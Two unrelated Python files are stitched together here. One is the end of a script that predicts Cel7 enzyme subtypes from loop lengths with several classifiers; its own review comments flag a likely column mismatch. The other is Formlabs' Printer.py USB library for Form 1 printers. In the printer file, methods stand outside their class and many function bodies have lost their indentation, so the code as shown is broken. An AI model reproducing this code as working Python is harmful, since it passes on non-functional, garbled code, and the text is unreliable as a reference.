looplength['accession'] = bioinf.get_accession(msafile)
looplength.to_csv('results_final/looplength.csv')
# Data preprocessing: prepare data for machine learning
#================================================================#
# Retrieve data
looplength = pd.read_csv('results_final/looplength.csv', index_col=0)
subtype = pd.read_csv('results_final/cel7_subtypes.csv', index_col=0)
looplength.index = range(len(looplength))
subtype.index = range(len(subtype))
assert looplength.accession.equals(subtype.accession)  # Ensure sequence positions are the same
# View the distribution to intuitively determine outliers
maxlength = [14, 20, 25, 16, 52, 141, 50, 14]  # Values equal or greater than are outliers
topcode_vals = []  # Change the outlier values to top-coded values
for i in range(8):
    sortedvals = sorted(looplength.iloc[:,i])
    maxval = maxlength[i]
    # The top-code value is the entry just below the first occurrence of
    # the cutoff in the sorted lengths.
    # NOTE(review): list.index raises ValueError if maxval never occurs in
    # this loop's lengths — this assumes each cutoff value is present.
    topcode_vals.append(sortedvals[sortedvals.index(maxval) - 1])
    color = ['blue' if x<maxval else 'red' for x in sortedvals]  # outliers in red
    loop = looplength.columns[i]
    plt.scatter(range(len(looplength)), sortedvals, color=color,
                marker='.')
    plt.xlabel('Index')
    plt.ylabel('Length')
    plt.title(loop)
    plt.show()
    plt.close()
# Deal with outliers
# Top-coding outliers before calculating Z-scores
X_grand = looplength.iloc[:,:-1]
for i in range(len(X_grand.columns)):
    vals = list(X_grand.iloc[:,i])
    vals = [x if x<maxlength[i] else topcode_vals[i] for x in vals]
    X_grand.iloc[:,i] = pd.Series(vals)
# Standardize data (convert to Z-scores)
scx = StandardScaler()
X_grand = pd.DataFrame(scx.fit_transform(X_grand))
# NOTE(review): features were selected with iloc[:,:-1] (drop last column)
# but labels come from iloc[:,1:] (drop first column). With the CSV layout
# written above (8 loop columns then 'accession'), these disagree and the
# column names here would be shifted by one — confirm intended selection.
X_grand.columns = looplength.iloc[:,1:].columns
y_grand = pd.Series(list(subtype['ncbi_pred_class']), index=range(len(subtype)))
# Apply machine learning to predict subtypes from loop lengths
#==============================================================================#
def get_classifier(clf_type, depth=1):
    '''Return an unfitted instance of the requested classifier.

    clf_type: 'dec' (entropy decision tree), 'svm' (RBF-kernel SVC),
    'knn' (10-nearest-neighbors), or 'log' (logistic regression).
    depth: maximum tree depth; only used for the decision tree.
    '''
    if clf_type == 'dec':
        chosen = DecisionTreeClassifier(criterion='entropy', max_depth=depth)
    elif clf_type == 'svm':
        chosen = SVC(kernel='rbf')
    elif clf_type == 'knn':
        chosen = KNeighborsClassifier(n_neighbors=10)
    elif clf_type == 'log':
        chosen = LogisticRegression()
    return chosen
def _clf_performance(y_test, y_pred):
    '''Return (sensitivity, specificity, accuracy, MCC) for binary
    predictions. The rates are percentages; MCC is 0.0 when its
    denominator is zero (degenerate confusion matrix).'''
    cm = confusion_matrix(y_test, y_pred)
    tn, tp, fn, fp = cm[0][0], cm[1][1], cm[1][0], cm[0][1]
    n = tp + fp + tn + fn
    accuracy = (tp + tn)/n * 100
    # Matthews correlation coefficient:
    #   (tp*tn - fp*fn) / sqrt((tp+fp)(tp+fn)(tn+fp)(tn+fn)).
    # The previous code used sqrt((tp+fp)*(tn+fn)*(tp+fp)*(tn+fp)),
    # which repeats (tp+fp) and omits (tp+fn) — an incorrect formula.
    denom = np.sqrt(float((tp + fp) * (tp + fn) * (tn + fp) * (tn + fn)))
    mcc = ((tp*tn) - (fp*fn))/denom if denom != 0 else 0.0
    # Guard each rate with its own denominator (the previous guards used
    # the wrong terms: tp+fp for sensitivity and tn+fn for specificity,
    # which still allowed division by zero).
    sens = tp/(tp + fn) * 100 if tp + fn != 0 else 0
    spec = tn/(tn + fp) * 100 if tn + fp != 0 else 0
    return sens, spec, accuracy, mcc
def apply_ML(X_grand, y_grand, clf_type, monte_count=100):
    '''Apply ML to predict subtypes from loop lengths.
    Each Monte Carlo iteration rebalances the classes by random
    undersampling and runs 5-fold cross validation, training on each of
    the 8 loop features alone and then on all 8 together.
    Return a tuple of dataframes, (performance summary, raw MCC samples).'''
    # Empty lists for storing final results
    sens_final, spec_final, acc_final, mcc_final = [], [], [], []
    # Monte Carlo loop
    for i in range(monte_count):
        # Balance the two subtypes by random undersampling
        RUS = RandomUnderSampler(random_state=None)
        X_select, y_select = RUS.fit_resample(X_grand, y_grand)
        X_select, y_select = pd.DataFrame(X_select), pd.Series(y_select)
        # K-fold cross validation
        kf = KFold(n_splits=5, shuffle=True, random_state=None)
        for train_index, test_index in kf.split(X_select):
            X_train, y_train = X_select.iloc[train_index,:], y_select.iloc[train_index]
            X_test, y_test = X_select.iloc[test_index,:], y_select.iloc[test_index]
            # Per-fold storage: one entry per single feature, plus 'all8'
            sens_store, spec_store, acc_store, mcc_store = [], [], [], []
            # Single-feature loop (train classifier on each feature alone)
            for j in range(8):
                classifier = get_classifier(clf_type)
                classifier.fit(pd.DataFrame(X_train.iloc[:,j]), y_train)
                y_pred = classifier.predict(pd.DataFrame(X_test.iloc[:,j]))
                sens, spec, accuracy, mcc = _clf_performance(y_test, y_pred)
                sens_store.append(sens)
                spec_store.append(spec)
                acc_store.append(accuracy)
                mcc_store.append(mcc)
            # Multiple-features (train classifier on all features)
            classifier = get_classifier(clf_type, depth=8)
            classifier.fit(X_train, y_train)
            y_pred = classifier.predict(pd.DataFrame(X_test))
            sens, spec, accuracy, mcc = _clf_performance(y_test, y_pred)
            sens_store.append(sens)
            spec_store.append(spec)
            acc_store.append(accuracy)
            mcc_store.append(mcc)
            # Save all results to final store
            sens_final.append(sens_store)
            spec_final.append(spec_store)
            acc_final.append(acc_store)
            mcc_final.append(mcc_store)
    sens_final = pd.DataFrame(sens_final)
    spec_final = pd.DataFrame(spec_final)
    acc_final = pd.DataFrame(acc_final)
    mcc_final = pd.DataFrame(mcc_final)
    mcc_final = mcc_final.fillna(0)
    # Combine results to a single dataframe
    results = pd.DataFrame()
    columns = ['A1', 'A2', 'A3', 'A4', 'B1','B2', 'B3', 'B4', 'all8']
    results['features'] = columns
    results['sens_mean'] = sens_final.mean()
    results['sens_std'] = sens_final.std()
    results['spec_mean'] = spec_final.mean()
    results['spec_std'] = spec_final.std()
    results['acc_mean'] = acc_final.mean()
    results['acc_std'] = acc_final.std()
    results['mcc_mean'] = mcc_final.mean()
    results['mcc_std'] = mcc_final.std()
    mcc_final.columns = columns
    return results, mcc_final
# Implement machine learning using 4 different classifiers (decision
# tree, RBF SVM, 10-NN, logistic regression); write the per-feature
# performance summary and the raw MCC samples for each to CSV.
clf_types = ['dec', 'svm', 'knn', 'log']
for clf_type in clf_types:
    results, mcc_data = apply_ML(X_grand, y_grand, clf_type, monte_count=100)
    results.to_csv(f'results_final/ml_subtype_pred/{clf_type}.csv')
    mcc_data.to_csv(f'results_final/mcc_data/{clf_type}.csv')
# Get single-node decision tree rules
#=====================================#
# NOTE(review): iloc[:,1:] drops the first column and keeps the rest.
# Given the CSV written above has the 8 loop columns first and
# 'accession' last, this selection appears to keep the accession string
# column and drop A1 — confirm; iloc[:,:-1] may have been intended.
X_grand = looplength.iloc[:,1:]  # Non-standardized lengths
for i in range(len(X_grand.columns)):
    # Rebalance classes, fit a depth-1 (single-split) tree on this one
    # feature, and export the learned rule as a PDF via graphviz.
    RUS = RandomUnderSampler(random_state=None)
    X = pd.DataFrame(X_grand.iloc[:,i])
    loop = X.columns
    X, y = RUS.fit_resample(X, y_grand)
    X, y = pd.DataFrame(X, columns=loop), pd.Series(y)
    clf = DecisionTreeClassifier(max_depth=1, criterion='entropy')
    clf.fit(X, y)
    dot_data = StringIO()
    tree.export_graphviz(clf, out_file=dot_data,
                         feature_names=X.columns,
                         class_names=['EG', 'CBH'],
                         filled=True, rounded=True,
                         special_characters=True)
    graph = pydot.graph_from_dot_data(dot_data.getvalue())
    graph.write_pdf(f'plots/dec_tree_rules/{X.columns[0]}.pdf')
# Probability of significant truncation in A4, B2, and B3 loops if the B4 loop is short
#========================================================================================#
X_grand = looplength.iloc[:,1:]  # Non-standardized lengths
# Sequences with a short B4 loop, then those also truncated in B3, A4 and B2
b4_less = X_grand[X_grand['B4'] <= 3]
also_truncated = (b4_less['B3'] <= 3) & (b4_less['A4'] <= 5) & (b4_less['B2'] <= 4)
all_less = b4_less[also_truncated]
proba = len(all_less) / len(b4_less) * 100
|
# -*- coding: utf-8 -*-
"""
Printer.py
A library to interface with the Form 1 and Form 1+ over USB
Copyright 2016-2017 Formlabs
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from __future__ import division
import ctypes
import errno
import io
import struct
import time
import ast
import usb.core
import numpy as np
from OpenFL import FLP
################################################################################
class DecodeError(RuntimeError):
    """Error type for failures decoding data from the printer."""
    pass
class BadResponse(RuntimeError):
    """Raised when the printer replies with an unexpected or error response."""
    pass
class LaserPowerError(RuntimeError):
    """Raised when a requested laser power is outside the safe/valid range."""
    pass
class Printer(object):
    """ Instantiation of a printer object

    Speaks the Form 1 / Form 1+ USB protocol: framed packets
    (SOF ... EOF with escape-encoding), block upload/download, and
    motion/laser control. Construct with connect=False to use the
    pure helper methods without hardware attached.
    """
    # VID and PID for the Form 1 and Form 1+
    VID = 0x16d0
    PID = 0x07eb
    # Endpoint numbers for TX and RX
    TX_EP = 0x81  # Printer -> computer
    RX_EP = 0x03  # Computer -> printer
    SOF = 0xFF  # Special character marking the beginning of a transmission
    EOF = 0xFE  # Special character marking the end of a transmission
    ESCAPE = 0xFD  # Character used to escape special characters in a bytestring
    # When True, outgoing laser-power data is checked against
    # LASER_POWER_MAX_MW (milliwatts) before being sent.
    AUDIT_LASER_POWER = True
    LASER_POWER_MAX_MW = 64
def __init__(self, connect=True, timeout_ms=10000):
    """ Opens a USB connection to the first attached Form 1 / Form 1+.

    connect: if False, skip USB discovery (self.dev is then never set;
             only the pure helper methods are usable).
    timeout_ms: timeout used for subsequent reads and writes.

    Raises RuntimeError if no printer is found; re-raises usb.USBError
    (annotated with a hint to close PreForm) if configuration fails.
    """
    if connect:
        self.dev = usb.core.find(idVendor=self.VID, idProduct=self.PID)
        if self.dev is None:
            raise RuntimeError("Could not find printer")
        # Short default per-transfer timeout; longer waits are done by
        # polling in higher-level methods.
        self.dev.default_timeout = 100
        try:
            self.dev.set_configuration()
        except usb.USBError as e:
            # PreForm holds the device exclusively while it is running.
            e.strerror += ". Be sure PreForm is closed."
            raise
    self.timeout_ms = timeout_ms
    self.incoming = []  # parsed (Command, payload) tuples awaiting poll()
    self.packet = bytearray()  # raw bytes not yet split into packets
    # These values are loaded from the printer as-needed
    self._laser_table = None
    self._grid_table = None
def _read(self, bufsize=1024):
""" Reads raw data from the printer's usual endpoint
"""
return bytearray(self.dev.read(self.TX_EP, bufsize, timeout=self.timeout_ms))
def _write(self, data):
""" Writes raw data to the printer's usual endpoint
"""
return self.dev.write(self.RX_EP, data, timeout=self.timeout_ms)
@classmethod
def _decode(cls, received):
""" Strips the escape characters from streamed data
"""
out = b''
escaping = False
for byte in received:
if escaping:
out += bytearray([byte + cls.ESCAPE])
escaping = False
elif byte == cls.ESCAPE:
escaping = True
else:
out += bytearray([byte])
return out
@classmethod
def _encode(cls, payload):
""" Protects a stream of data with escape characters
The payload should be a bytestring
"""
out = b''
for byte in payload:
if byte >= cls.ESCAPE:
out += bytearray([cls.ESCAPE])
byte = ctypes.c_uint8(byte - cls.ESCAPE).value
out += bytearray([byte])
return out
@classmethod
def _interpret(cls, cmd, data):
    """ Applies a command-specific interpretation to the data
        cmd is a Command object
        data is a decoded packet
    Returns a State, an int, a Response, raw payload bytes, or None
    (for an empty payload), depending on cmd and payload length.
    """
    if cmd == Command.CMD_MACHINE_STATE:
        return State(data[0])
    # Layer and block done return the layer / block number
    elif cmd in [Command.STATUS_LAYER_DONE, Command.STATUS_BLOCK_DONE]:
        return struct.unpack('<I', data)[0]
    # Assume one-byte responses to be a standard error code
    # (unless specified above)
    elif len(data) == 1:
        return Response(data[0])
    else:
        # Multi-byte payloads pass through unchanged; empty -> None
        return data if data else None
def _process_raw(self, data):
    """ Processes a stream of raw data, breaking it into packets
        Packets are stored as (Command, Payload) tuples in self.incoming
        Incomplete trailing data is kept in self.packet for the next call.
    """
    self.packet += data
    # Trim data off the front until we find a SOF character.
    # (Guard on emptiness: the previous version popped blindly and
    # raised IndexError when the buffer contained no SOF at all.)
    while self.packet and self.packet[0] != self.SOF:
        self.packet.pop(0)
    # Process the packet, loading data into self.incoming
    while self.packet:
        # A lone SOF byte means the command byte hasn't arrived yet;
        # wait for more data. (Previously this indexed packet[1] and
        # raised IndexError on such a partial read.)
        if len(self.packet) < 2:
            break
        cmd = Command(self.packet[1])
        # If the packet contains an EOF character, then read in the
        # full packet and store it in the incoming buffer
        try:
            p, self.packet = self.packet[2:].split(bytearray([self.EOF]), 1)
        except ValueError:
            break
        else:
            self.incoming.append(
                (cmd, self._interpret(cmd, self._decode(p))))
def _command(self, cmd, payload=b'', wait=True, expect_success=False, verbose=False):
    """ Transmits a command to the printer
        The command is wrapped in the form SOF, cmd, encode(payload), EOF
        If wait is true, waits for the acknowledgment
            (in the form of a returned packet with cmd)
        wait can also be a list of valid returned packet Commands
            (for commands with multiple return options)
        If expect_success is True and the returned response is not SUCCESS,
        raises a BadResponse error with the Response code.
    Returns the reply payload, or None when wait is falsy.
    """
    self._write(bytearray([self.SOF, cmd.value])
                + self._encode(payload) + bytearray([self.EOF]))
    if wait is True:
        # Default: wait for an echo packet carrying the same command
        wait = [cmd]
    if wait:
        r = self._wait_for_packet(wait, verbose=verbose)
        if expect_success and r != Response.SUCCESS:
            raise BadResponse(r)
        return r
    else:
        return None
def _wait_for_packet(self, cmd, verbose=True):
    """ Waits for a returned packet of the given type(s).
        Returns the packet's payload.
        If verbose is True, prints all packets received while waiting
        cmd may be a single Command or a list of Commands.
    Blocks indefinitely; non-matching packets are consumed and dropped.
    """
    if isinstance(cmd, Command):
        cmd = [cmd]
    while True:
        p = self.poll()
        if verbose and p is not None:
            # Truncate bytearrays to prevent huge printouts
            if type(p[1]) is bytearray:
                print("(%s, <%i byte payload>)" % (p[0], len(p[1])))
            else:
                print(p)
        if p is not None and p[0] in cmd:
            return p[1]
def poll(self, bufsize=1024):
    """ Returns the next received packet as a tuple (command, payload)
        If there are no packets pending, returns None
    May block for up to the USB read timeout while waiting for data.
    """
    # Attempt to load data from USB and push it into the incoming buffer
    while not self.incoming:
        try:
            raw = self._read(bufsize)
        except usb.core.USBError as e:
            # The only acceptable USB errors are timeout errors
            # (when the device hasn't sent us any new data)
            if e.errno != errno.ETIMEDOUT:
                raise e
            break
        else:
            self._process_raw(raw)
    # Return the oldest packet or None
    return self.incoming.pop(0) if self.incoming else None
def initialize(self):
    """ Runs the printer through its initialization sequence:
        Stops any print or operation
        Resets the machine
        Sets laser current to zero
        Sets galvo position to 0, 0
        Homes Z axis against limit switch and rams tilt against hard stop
        Sets feed rates to default values
    Raises BadResponse if the printer does not acknowledge SUCCESS.
    """
    self._command(Command.CMD_INITIALIZE, expect_success=True)
def shutdown(self):
    """ Turns off all parts of the printer other than the processor
    Raises BadResponse if the printer does not acknowledge SUCCESS.
    """
    self._command(Command.CMD_SHUTDOWN, expect_success=True)
def list_blocks(self):
    """ Lists blocks stored on the printer, returning a tuple of
        block numbers. The reply is a uint32 count followed by that
        many uint32 block numbers (all little-endian).
    """
    data = self._command(Command.CMD_LIST_BLOCKS)
    count = struct.unpack('<I', data[:4])[0]
    return struct.unpack('<%iI' % count, data[4:])
def delete_block(self, block, end=None):
    """ Removes a block by number.
        If end is given, deletes from block to end (inclusive);
        otherwise only `block` itself is deleted.
    Raises BadResponse if the printer does not acknowledge SUCCESS.
    """
    last = block if end is None else end
    payload = bytearray(struct.pack('<II', block, last))
    self._command(Command.CMD_DELETE_BLOCKS, payload, expect_success=True)
def read_block_raw(self, block):
    """ Reads a block by number, returning its raw data bytes.
        May instead return a Response code if the printer replied with
        one; raises BadResponse for a malformed request or if the reply
        fails its sanity checks.
    """
    data = self._command(Command.CMD_READ_BLOCK,
                         bytearray(struct.pack('<I', block)),
                         wait=[Command.CMD_READ_BLOCK, Command.CMD_READ_BLOCK_DATA])
    # If we got a response code, return it immediately
    if isinstance(data, Response):
        if data == Response.ERROR_MALFORMED_REQUEST:
            raise BadResponse("Got %s; is this block on the printer?" % data)
        return data
    # Extract block and count from the returned data
    block_received, count = struct.unpack('<II', data[:8])
    # Sanity-check responses
    if block_received != block:
        raise BadResponse("Block received was not block requested")
    elif count != len(data) - 12:
        # 12 = 8-byte header + 4-byte trailing CRC
        raise BadResponse("Didn't receive enough data in the block")
    # Return the data section of the block, stripping the trailing CRC
    return data[8:-4]
def read_block_flp(self, block):
    """ Reads a block by number and parses it into an FLP.Packets object. """
    return FLP.fromstring(self.read_block_raw(block))
@staticmethod
def _fletcher32(data):
""" As it turns out, the firmware doesn't implement CRC checking.
"""
return 0
def audit_laser_power_flp(self, flp):
    """ Scan an FLP packet list and raise (via check_laser_ticks) if
        any laser-power packet requests an unsafe power level.
    """
    for packet in flp:
        if isinstance(packet, FLP.LaserPowerLevel):
            self.check_laser_ticks(packet.power)
def check_laser_ticks(self, power):
""" Raises if the power (in laser ticks) is above our safe threshold
"""
mW = self.ticks_to_mW(power)
if mW > self.LASER_POWER_MAX_MW:
raise LaserPowerError('Requested power is dangerously high.')
def get_machine_information(self):
    """ Queries the printer for identification and version information.
        Returns a dict with keys modelNumber, serialNumber,
        firmwareVersion, gitVersion, libmapleVersion,
        mapleSdFatVersion, and tinyprintfVersion.
    """
    raw = self._command(Command.CMD_MACHINE_INFORMATION)
    values = struct.unpack('<I32sI7s7s7s7s', raw)
    keys = ('modelNumber', 'serialNumber', 'firmwareVersion',
            'gitVersion', 'libmapleVersion', 'mapleSdFatVersion',
            'tinyprintfVersion')
    return {field: value for field, value in zip(keys, values)}
def write_block(self, block, data, skip_audit=False):
    """ Writes a block.
        block is an integer
        data is a bytearray, filename, or FLP.Packets object
        skip_audit: internal flag set by write_block_flp, which has
        already audited the laser power itself.
    Raises BadResponse if the printer does not acknowledge SUCCESS.
    """
    if isinstance(data, FLP.Packets):
        # FLP objects are serialized (and audited) by write_block_flp
        assert skip_audit == False
        return self.write_block_flp(block, data)
    if not isinstance(data, bytearray):
        # Anything else is treated as a path to a file of raw block data
        data = bytearray(open(data, 'rb').read())
    # Check to see that laser power is always acceptable,
    # raising an exception if the power is too high
    if self.AUDIT_LASER_POWER and not skip_audit:
        flp = FLP.fromstring(data)
        self.audit_laser_power_flp(flp)
    # Header: block number, payload length, checksum (always 0 here)
    header = bytearray(
        struct.pack('<III', block, len(data), self._fletcher32(data)))
    self._command(Command.CMD_LOAD_PRINT_DATA_BLOCK, header + data,
                  expect_success=True)
def write_block_flp(self, block, flp):
    """ Writes FLP data to a block.
        block is an integer
        flp is a FLP.Packets object
    Raises TypeError if flp is not an FLP.Packets instance.
    (A leftover debug print statement was removed from this method.)
    """
    if not isinstance(flp, FLP.Packets):
        raise TypeError("flp must be a FLP.Packets instance; got a {}.".format(type(flp)))
    # Audit here rather than in write_block: the delegation below passes
    # skip_audit=True, so this is the only laser-power check on this path.
    if self.AUDIT_LASER_POWER:
        self.audit_laser_power_flp(flp)
    self.write_block(block, bytearray(flp.tostring()), skip_audit=True)
def block_size(self, block):
    """ Returns the size in bytes of the given block on the printer.
        Raises BadResponse if the reply describes a different block.
    """
    data = self._command(Command.CMD_BLOCK_INFORMATION,
                         bytearray(struct.pack('<I', block)))
    reported_block, size, _crc = struct.unpack('<III', data)
    if reported_block != block:
        raise BadResponse("Block received was not block requested")
    return size
def _read_cal_field(self, cmd):
    """ Reads a calibration field from the printer
        command must be CMD_READ_LASER_TABLE, CMD_READ_GRID_TABLE, or
        CMD_READ_ZSENSOR_HEIGHT
    Returns the parsed Python value (via ast.literal_eval), or the raw
    Response object if the printer replied with an error code.
    """
    data = self._command(cmd)
    if isinstance(data, Response):
        return data
    # Extract block and count from the returned data
    count = struct.unpack('<I', data[:4])[0]
    # Sanity-check responses (8 = 4-byte count + 4-byte trailing CRC)
    if count != len(data) - 8:
        raise BadResponse("Didn't receive enough data in the block")
    # Return the data section of the block, stripping the trailing CRC
    # and evaluating to get a list of lists
    return ast.literal_eval(np.atleast_1d(data[4:-4])[0].decode('utf-8'))
def read_laser_table(self):
    """ Reads the printer's laser power calibration table
        (parsed via _read_cal_field).
    """
    return self._read_cal_field(Command.CMD_READ_LASER_TABLE)
def read_grid_table(self):
    """ Reads the printer's galvo calibration grid table.
        (The previous docstring said "laser table" — a copy-paste error;
        this issues CMD_READ_GRID_TABLE.)
    """
    return self._read_cal_field(Command.CMD_READ_GRID_TABLE)
def read_zsensor_height(self):
    """ Reads the printer's Z height
        (parsed via _read_cal_field).
    """
    return self._read_cal_field(Command.CMD_READ_ZSENSOR_HEIGHT)
def state(self):
    """ Checks the printer's state, returning a State object
        (the CMD_MACHINE_STATE payload, decoded by _interpret).
    """
    return self._command(Command.CMD_MACHINE_STATE)
def _wait_for_state(self, state=None, dt=0.1):
    """ Blocks until the printer reports one of the given states.
        state: a State, an iterable of States, or None
               (None waits for MACHINE_READY_TO_PRINT)
        dt: polling interval in seconds
    """
    if state is None:
        state = State.MACHINE_READY_TO_PRINT
    targets = state if hasattr(state, '__iter__') else [state]
    while self.state() not in targets:
        time.sleep(dt)
def start_printing(self, block, end=None):
    """ Begins printing from the given block, returning immediately
        The range (block, end) is half-open, so:
        * block == 0, end == 1 is just layer 0
        * block == 0, end == 2 is layer 0 and 1
        * block == 10, end == 20 is layer 10, 11, ..., 19
        If end is None, then it just prints one layer.
        The printer may receive the following packets while printing:
            STATUS_LAYER_DONE
            STATUS_LAYER_NON_FATAL_ERROR
            STATUS_BLOCK_DONE
            STATUS_PRINT_DONE
    Raises RuntimeError for an empty/inverted range, BadResponse if the
    printer does not acknowledge SUCCESS.
    """
    if end is None:
        end = block + 1
    # Guard against an empty or inverted half-open range
    if end <= block:
        raise RuntimeError("end must be > block")
    self._command(Command.CMD_START_PRINTING,
                  bytearray(struct.pack('<II', block, end)),
                  expect_success=True)
def stop_printing(self):
    """ Stops a print in progress
        Turns the laser off and stops any in-progress galvo and motor moves
    Raises BadResponse if the printer does not acknowledge SUCCESS.
    """
    self._command(Command.CMD_STOP_PRINTING, expect_success=True)
def pause_printing(self):
    """ Sets the pause flag on the printer.
        When the pause flag is set, the printer will pause at the next
        layer end command.
        A paused printer stops executing its current block and waits for
        debug commands
    Raises BadResponse if the printer does not acknowledge SUCCESS.
    """
    self._command(Command.CMD_PAUSE_PRINTING, expect_success=True)
def unpause_printing(self):
    """ Clears the pause flag on the printer.
    Raises BadResponse if the printer does not acknowledge SUCCESS.
    """
    self._command(Command.CMD_UNPAUSE_PRINTING, expect_success=True)
def move_z(self, steps, feedrate, current=80):
    """ Moves the Z stepper a certain number of steps
        steps is a signed number of microsteps to move
        feedrate is speed in microsteps per second
        current is the current value (at a scale of 80 per amp)
        The motor driver will current-limit and turn off if the current
        is too high (about 160)
    Raises BadResponse if the printer does not acknowledge SUCCESS.
    """
    # Payload: int32 steps, uint32 feedrate, uint8 current
    self._command(Command.CMD_MOVE_Z_STEPPER_INCREMENTAL,
                  bytearray(struct.pack('<iIB', steps, feedrate, current)),
                  expect_success=True)
def set_laser_uint16(self, x, y, power=25000):
    """ Sets the position and laser power level
        x and y are unsigned 16-bit values (0 to 0xffff)
            (with 0 at the corner of the platform)
        power is an unsigned 16-bit integer
        Setting power too high can damage your diode!
    Raises LaserPowerError (via check_laser_ticks) when auditing is on
    and the power is unsafe; BadResponse if not acknowledged.
    """
    if self.AUDIT_LASER_POWER:
        self.check_laser_ticks(power)
    self._command(Command.CMD_POSITION_LASER,
                  bytearray(struct.pack('<HHH', x, y, power)),
                  expect_success=True)
def set_laser_sint16(self, x, y, power=25000):
""" Sets the position and laser power level
x and y are signed 16-bit values (-32768 to 32767)
(with 0 at the center of the platform)
power is an unsigned 16-bit integer
Setting power too high can damage your diode!
"""
return self.set_laser_uint16(x + round(0xffff/2), y + round(0xffff/2), power)
def set_laser_mm_mW(self, x_mm, y_mm, mW=10):
""" Sets the laser position in mm and power in mW.
Position (0, 0) is the center of the field.
"""
x, y = self.mm_to_galvo(x_mm, y_mm)
return self.set_laser_uint16(x, y, self.mW_to_ticks(mW))
def ticks_to_mW(self, ticks):
""" Given a power number, return the power in mW
This conversion depends on per-printer calibration.
"""
if self._laser_table is None:
self._laser_table = np.asarray(self.read_laser_table())
return np.interp(ticks,
self._laser_table[:,0] * float(0xffff) / 3.3,
self._laser_table[:,1])
def mW_to_ticks(self, mW):
""" Converts a power in mW to arbitrary laser units
This conversion depends on per-printer calibration.
Raises an exception if the desired power is out of range.
"""
if self._laser_table is None:
self._laser_table = np.asarray(self.read_laser_table())
if mW > max(self._laser_table[:,1]):
raise LaserPowerError(
'Requested power (%.2f mW) exceeds max power (%.2f mW)' %
(mW, max(self._laser_table[:,1])))
# Convert to power values with linear interpolation
result = np.interp(mW, self._laser_table[:,1],
self._laser_table[:,0] * float(0xffff) / 3.3)
if result < 0 or result > 0xffff:
raise LaserPowerError(
'Requested power is not a uint16. Check power table.')
return result
def mm_to_galvo(self, x, y):
    """ Given one or many points in mm space, map them to galvo space.
    e.g.,
    >>> Printer.mm_to_galvo(0, 0) # -> galvo ticks for middle of build area.
    >>> Printer.mm_to_galvo([[0, 1, 2], [0, 0, 0]]) # -> A three-segment line along the x axis.
    The returned array is 2xN, where N is the number of source points
    (flattened to shape (2,) when called with scalars).
    """
    xshape = np.shape(x)  # remember whether the caller passed scalars
    if self._grid_table is None:
        # Lazily fetch the 5x5 calibration grid and build interpolators
        grid = np.array(self.read_grid_table())
        assert grid.shape == (5, 5, 2)
        pts_mm = np.linspace(-64, 64, 5)  # Grid positions in mm
        # Interpolators for X and Y values (mm to galvo ticks)
        # NOTE(review): scipy.interpolate.interp2d is deprecated and was
        # removed in SciPy 1.14; this path needs migration (e.g. to
        # RectBivariateSpline) to run on modern SciPy — confirm target
        # SciPy version.
        import scipy.interpolate
        fit_x = scipy.interpolate.interp2d(pts_mm, pts_mm, grid[:,:,0])
        fit_y = scipy.interpolate.interp2d(pts_mm, pts_mm, grid[:,:,1])
        self._grid_table = (fit_x, fit_y)
    if np.shape(x) != np.shape(y):
        raise TypeError('x and y shapes must match. Got x.shape: {}, y.shape: {}'.format(np.shape(x), np.shape(y)))
    x = np.atleast_1d(x)
    y = np.atleast_1d(y)
    # Interpolate each (x, y) pair through the calibration fits
    x_ = [self._grid_table[0](a, b) for a, b in zip(x, y)]
    y_ = [self._grid_table[1](a, b) for a, b in zip(x, y)]
    result = np.hstack([x_, y_]).T
    if xshape == ():  # If it's called with scalars, return a flat result.
        return result.flatten()
    return result
@staticmethod
def sample_line_segment_mm_s(start_xy_mm, end_xy_mm, dt_s, mW=None, max_mm=5.0):
""" Given a line segment in mm space, map it to galvo space.
To make the line straight in mm space, samples may be added to
more-closely approximate a straight line.
Returns: An array of shape nx3 (if mW is None) or nx4 (if mW is not None)
of points time deltas in mm and seconds,
excluding start_xy_mm and including end_xy_mm,
possibly including samples along the way.
"""
import FLP
from numpy.linalg import norm
dist_mm = norm(np.asarray(end_xy_mm) - start_xy_mm)
if dist_mm <= max_mm:
if mW is None:
return np.array((tuple(end_xy_mm) + (dt_s,),)) # Just the end sample.
else:
return np.array((tuple(end_xy_mm) + (dt_s, mW),)) # Just the end sample.
samples_s = np.linspace(0, dt_s, np.ceil(dist_mm / max_mm) + 1)
timeRange_s = (0, dt_s)
if mW is None:
return np.transpose([np.interp(samples_s[1:], timeRange_s, (start_xy_mm[0], end_xy_mm[0])),
np.interp(samples_s[1:], timeRange_s, (start_xy_mm[1], end_xy_mm[1])),
np.diff(samples_s)])
else:
return np.transpose([np.interp(samples_s[1:], timeRange_s, (start_xy_mm[0], end_xy_mm[0])),
np.interp(samples_s[1:], timeRange_s, (start_xy_mm[1], end_xy_mm[1])),
np.diff(samples_s),
mW * np.ones_like(samples_s[1:])])
@staticmethod
def sample_line_segments_mm_s(start_xy_mm, xys_mm, dts_s, mWs, max_mm=5.0):
""" Given a sequence of x, y, dt, mW, return a new sequence
with samples added as needed for interpolation.
"""
if len(xys_mm) != len(dts_s) or len(xys_mm) != len(mWs):
raise TypeError('Samples must be the same length.')
if len(xys_mm) == 0:
return np.zeros((0, 3))
result = [Printer.sample_line_segment_mm_s(start_xy_mm,
xys_mm[0],
dts_s[0],
mW=mWs[0],
max_mm=max_mm)]
for start_mm, end_mm, dt_s, mW in zip(xys_mm[:-1],
xys_mm[1:],
dts_s[1:],
mWs[1:]):
newChunk = Printer.sample_line_segment_mm_s(start_mm,
end_mm,
dt_s,
mW=mW,
max_mm=max_mm)
result.append(newChunk)
return np.vstack(result)
def samples_to_FLP(self, xy_mm_dts_s_mW, max_mm=5.0):
import FLP
clock_Hz = FLP.XYMoveClockRate.moverate_Hz()
xyticks = []
import numpy as np
xy_mm_dts_s_mW = np.asarray(xy_mm_dts_s_mW)
result = FLP.Packets()
xydtmW = self.sample_line_segments_mm_s(start_xy_mm=xy_mm_dts_s_mW[0,:2],
xys_mm=xy_mm_dts_s_mW[1:,:2],
dts_s=xy_mm_dts_s_mW[1:,2],
mWs=xy_mm_dts_s_mW[1:,3],
max_mm=5.0)
# Use the starting row, then interpolate elsewhere.
xydtmW = np.vstack([xy_mm_dts_s_mW[:1],
np.hstack([xydtmW[:,:2], xydtmW[:,2:3], xydtmW[:,3:4]])
])
last_mW = None
